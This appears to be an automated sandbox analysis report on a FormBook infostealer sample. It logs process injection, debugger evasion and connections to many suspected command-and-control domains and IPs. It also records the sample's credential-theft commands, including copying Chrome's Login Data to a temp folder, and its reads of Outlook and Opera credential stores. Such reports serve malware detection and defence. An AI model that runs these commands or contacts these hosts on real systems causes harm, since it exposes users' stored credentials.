          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B6CF0 mov eax, dword ptr fs:[00000030h]13_2_053B6CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B6CF0 mov eax, dword ptr fs:[00000030h]13_2_053B6CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053358EC mov eax, dword ptr fs:[00000030h]13_2_053358EC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053CB8D0 mov eax, dword ptr fs:[00000030h]13_2_053CB8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053CB8D0 mov ecx, dword ptr fs:[00000030h]13_2_053CB8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053CB8D0 mov eax, dword ptr fs:[00000030h]13_2_053CB8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053CB8D0 mov eax, dword ptr fs:[00000030h]13_2_053CB8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053CB8D0 mov eax, dword ptr fs:[00000030h]13_2_053CB8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053CB8D0 mov eax, dword ptr fs:[00000030h]13_2_053CB8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536E730 mov eax, dword ptr fs:[00000030h]13_2_0536E730
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05408B58 mov eax, dword ptr fs:[00000030h]13_2_05408B58
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05334F2E mov eax, dword ptr fs:[00000030h]13_2_05334F2E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05334F2E mov eax, dword ptr fs:[00000030h]13_2_05334F2E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0535F716 mov eax, dword ptr fs:[00000030h]13_2_0535F716
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F131B mov eax, dword ptr fs:[00000030h]13_2_053F131B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05408F6A mov eax, dword ptr fs:[00000030h]13_2_05408F6A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053CFF10 mov eax, dword ptr fs:[00000030h]13_2_053CFF10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053CFF10 mov eax, dword ptr fs:[00000030h]13_2_053CFF10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536A70E mov eax, dword ptr fs:[00000030h]13_2_0536A70E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536A70E mov eax, dword ptr fs:[00000030h]13_2_0536A70E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05363B7A mov eax, dword ptr fs:[00000030h]13_2_05363B7A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05363B7A mov eax, dword ptr fs:[00000030h]13_2_05363B7A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0540070D mov eax, dword ptr fs:[00000030h]13_2_0540070D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0540070D mov eax, dword ptr fs:[00000030h]13_2_0540070D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0533DB60 mov ecx, dword ptr fs:[00000030h]13_2_0533DB60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0534FF60 mov eax, dword ptr fs:[00000030h]13_2_0534FF60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0533F358 mov eax, dword ptr fs:[00000030h]13_2_0533F358
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0533DB40 mov eax, dword ptr fs:[00000030h]13_2_0533DB40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0534EF40 mov eax, dword ptr fs:[00000030h]13_2_0534EF40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05364BAD mov eax, dword ptr fs:[00000030h]13_2_05364BAD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05364BAD mov eax, dword ptr fs:[00000030h]13_2_05364BAD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05364BAD mov eax, dword ptr fs:[00000030h]13_2_05364BAD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05348794 mov eax, dword ptr fs:[00000030h]13_2_05348794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05362397 mov eax, dword ptr fs:[00000030h]13_2_05362397
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536B390 mov eax, dword ptr fs:[00000030h]13_2_0536B390
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B7794 mov eax, dword ptr fs:[00000030h]13_2_053B7794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B7794 mov eax, dword ptr fs:[00000030h]13_2_053B7794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B7794 mov eax, dword ptr fs:[00000030h]13_2_053B7794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F138A mov eax, dword ptr fs:[00000030h]13_2_053F138A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05341B8F mov eax, dword ptr fs:[00000030h]13_2_05341B8F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05341B8F mov eax, dword ptr fs:[00000030h]13_2_05341B8F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053ED380 mov ecx, dword ptr fs:[00000030h]13_2_053ED380
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053737F5 mov eax, dword ptr fs:[00000030h]13_2_053737F5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053603E2 mov eax, dword ptr fs:[00000030h]13_2_053603E2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053603E2 mov eax, dword ptr fs:[00000030h]13_2_053603E2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053603E2 mov eax, dword ptr fs:[00000030h]13_2_053603E2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053603E2 mov eax, dword ptr fs:[00000030h]13_2_053603E2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053603E2 mov eax, dword ptr fs:[00000030h]13_2_053603E2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053603E2 mov eax, dword ptr fs:[00000030h]13_2_053603E2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0535DBE9 mov eax, dword ptr fs:[00000030h]13_2_0535DBE9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05405BA5 mov eax, dword ptr fs:[00000030h]13_2_05405BA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B53CA mov eax, dword ptr fs:[00000030h]13_2_053B53CA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053B53CA mov eax, dword ptr fs:[00000030h]13_2_053B53CA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053EFE3F mov eax, dword ptr fs:[00000030h]13_2_053EFE3F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0533E620 mov eax, dword ptr fs:[00000030h]13_2_0533E620
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05374A2C mov eax, dword ptr fs:[00000030h]13_2_05374A2C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05374A2C mov eax, dword ptr fs:[00000030h]13_2_05374A2C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05408A62 mov eax, dword ptr fs:[00000030h]13_2_05408A62
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05335210 mov eax, dword ptr fs:[00000030h]13_2_05335210
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05335210 mov ecx, dword ptr fs:[00000030h]13_2_05335210
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05335210 mov eax, dword ptr fs:[00000030h]13_2_05335210
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05335210 mov eax, dword ptr fs:[00000030h]13_2_05335210
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0533AA16 mov eax, dword ptr fs:[00000030h]13_2_0533AA16
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0533AA16 mov eax, dword ptr fs:[00000030h]13_2_0533AA16
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05353A1C mov eax, dword ptr fs:[00000030h]13_2_05353A1C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536A61C mov eax, dword ptr fs:[00000030h]13_2_0536A61C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0536A61C mov eax, dword ptr fs:[00000030h]13_2_0536A61C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0533C600 mov eax, dword ptr fs:[00000030h]13_2_0533C600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0533C600 mov eax, dword ptr fs:[00000030h]13_2_0533C600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0533C600 mov eax, dword ptr fs:[00000030h]13_2_0533C600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05368E00 mov eax, dword ptr fs:[00000030h]13_2_05368E00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_053F1608 mov eax, dword ptr fs:[00000030h]13_2_053F1608
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_05348A0A mov eax, dword ptr fs:[00000030h]13_2_05348A0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0535AE73 mov eax, dword ptr fs:[00000030h]13_2_0535AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0535AE73 mov eax, dword ptr fs:[00000030h]13_2_0535AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0535AE73 mov eax, dword ptr fs:[00000030h]13_2_0535AE73
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeProcess queried: DebugPortJump to behavior
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeProcess queried: DebugPortJump to behavior
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 1_2_00409B50 LdrLoadDll,1_2_00409B50

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Benign windows process drops PE filesShow sources
          Source: C:\Windows\explorer.exeFile created: 5jsdph8p9l_r.exe.4.drJump to dropped file
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.stlaurenthp.com
          Source: C:\Windows\explorer.exeDomain query: www.brasbux.com
          Source: C:\Windows\explorer.exeNetwork Connect: 37.187.131.150 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.serenityminded.com
          Source: C:\Windows\explorer.exeDomain query: www.cosmetictreat.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.qgt114.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 150.95.255.38 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.palisadestahoeresorts.com
          Source: C:\Windows\explorer.exeNetwork Connect: 145.131.10.226 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 167.172.158.202 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cmledbetter.com
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 183.181.96.79 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.trust-top.net
          Source: C:\Windows\explorer.exeDomain query: www.buyfood.store
          Source: C:\Windows\explorer.exeDomain query: www.geefmijcorona.online
          Source: C:\Windows\explorer.exeNetwork Connect: 155.159.216.37 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.totusnet.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.66.86 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.earthsidesoulalchemist.com
          Source: C:\Windows\explorer.exeDomain query: www.alhudadevelopers.com
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.147.118 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lawsonboards.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.37.103.70 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.minecrafttop.net
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.27.31 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.alsafi.website
          Source: C:\Windows\explorer.exeDomain query: www.14attrayanteoffre.com
          Source: C:\Windows\explorer.exeDomain query: www.eco1tnpasumo3.xyz
          Source: C:\Windows\explorer.exeDomain query: www.ayushigangwar.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.8straps.com
          Source: C:\Windows\explorer.exeNetwork Connect: 5.77.41.136 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lkdwaterfowlers.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 11F0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeMemory written: C:\Users\user\Desktop\MV ROCKET_PDA.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeMemory written: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeMemory written: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeMemory written: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3352Jump to behavior
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeProcess created: C:\Users\user\Desktop\MV ROCKET_PDA.exe 'C:\Users\user\Desktop\MV ROCKET_PDA.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MV ROCKET_PDA.exe'Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /VJump to behavior
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeProcess created: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeJump to behavior
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeProcess created: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe 'C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe' Jump to behavior
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeProcess created: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe 'C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe' Jump to behavior
          Source: explorer.exe, 00000004.00000000.306066793.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000004.00000000.280472597.00000000011E0000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000002.802188150.0000000003BC0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.280472597.00000000011E0000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000002.802188150.0000000003BC0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.280472597.00000000011E0000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000002.802188150.0000000003BC0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.280472597.00000000011E0000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000002.802188150.0000000003BC0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.315377461.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040312A

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 41.2.5jsdph8p9l_r.exe.e800000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MV ROCKET_PDA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MV ROCKET_PDA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 40.1.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MV ROCKET_PDA.exe.e7d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 39.2.5jsdph8p9l_r.exe.e820000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 41.2.5jsdph8p9l_r.exe.e800000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.MV ROCKET_PDA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 38.2.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 39.2.5jsdph8p9l_r.exe.e820000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.1.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 38.2.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.2.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 37.2.5jsdph8p9l_r.exe.e800000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 40.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 38.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MV ROCKET_PDA.exe.e7d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.2.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.300351078.000000000D4A4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.755075505.000000000E800000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.279433578.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000026.00000002.754112102.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000028.00000002.778458695.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.799581711.00000000011C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000002.793073611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326284142.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000026.00000001.751913431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000028.00000001.775791090.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326230897.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000029.00000002.793993652.000000000E800000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.276768866.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.801537321.0000000003600000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000027.00000002.780001477.000000000E820000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000001.790583041.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file access)Show sources
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 41.2.5jsdph8p9l_r.exe.e800000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MV ROCKET_PDA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MV ROCKET_PDA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 40.1.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MV ROCKET_PDA.exe.e7d0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 39.2.5jsdph8p9l_r.exe.e820000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 41.2.5jsdph8p9l_r.exe.e800000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.MV ROCKET_PDA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 38.2.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 39.2.5jsdph8p9l_r.exe.e820000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.1.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 38.2.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.2.5jsdph8p9l_r.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 37.2.5jsdph8p9l_r.exe.e800000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 40.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 38.1.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MV ROCKET_PDA.exe.e7d0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 42.2.5jsdph8p9l_r.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.300351078.000000000D4A4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000025.00000002.755075505.000000000E800000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.279433578.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000026.00000002.754112102.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000028.00000002.778458695.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.799581711.00000000011C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000002.793073611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326284142.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000026.00000001.751913431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000028.00000001.775791090.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326230897.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326090880.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000029.00000002.793993652.000000000E800000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.276768866.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.801537321.0000000003600000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000027.00000002.780001477.000000000E820000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000002A.00000001.790583041.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_72E41CC0 CreateBindCtx,ShellExecuteW,CoTaskMemFree,0_2_72E41CC0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_72E416D0 CreateBindCtx,MkParseDisplayName,wcschr,CreateFileMoniker,0_2_72E416D0
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_72E41590 CreateBindCtx,wcschr,CoTaskMemFree,0_2_72E41590
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_72E41930 CreateBindCtx,0_2_72E41930
          Source: C:\Users\user\Desktop\MV ROCKET_PDA.exeCode function: 0_2_72E41B00 CreateBindCtx,0_2_72E41B00
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 37_2_702B1930 CreateBindCtx,37_2_702B1930
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 37_2_702B1B00 CreateBindCtx,37_2_702B1B00
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 37_2_702B1590 CreateBindCtx,wcschr,CoTaskMemFree,37_2_702B1590
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 37_2_702B1CC0 CreateBindCtx,ShellExecuteW,CoTaskMemFree,37_2_702B1CC0
          Source: C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exeCode function: 37_2_702B16D0 CreateBindCtx,MkParseDisplayName,wcschr,CreateFileMoniker,37_2_702B16D0

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
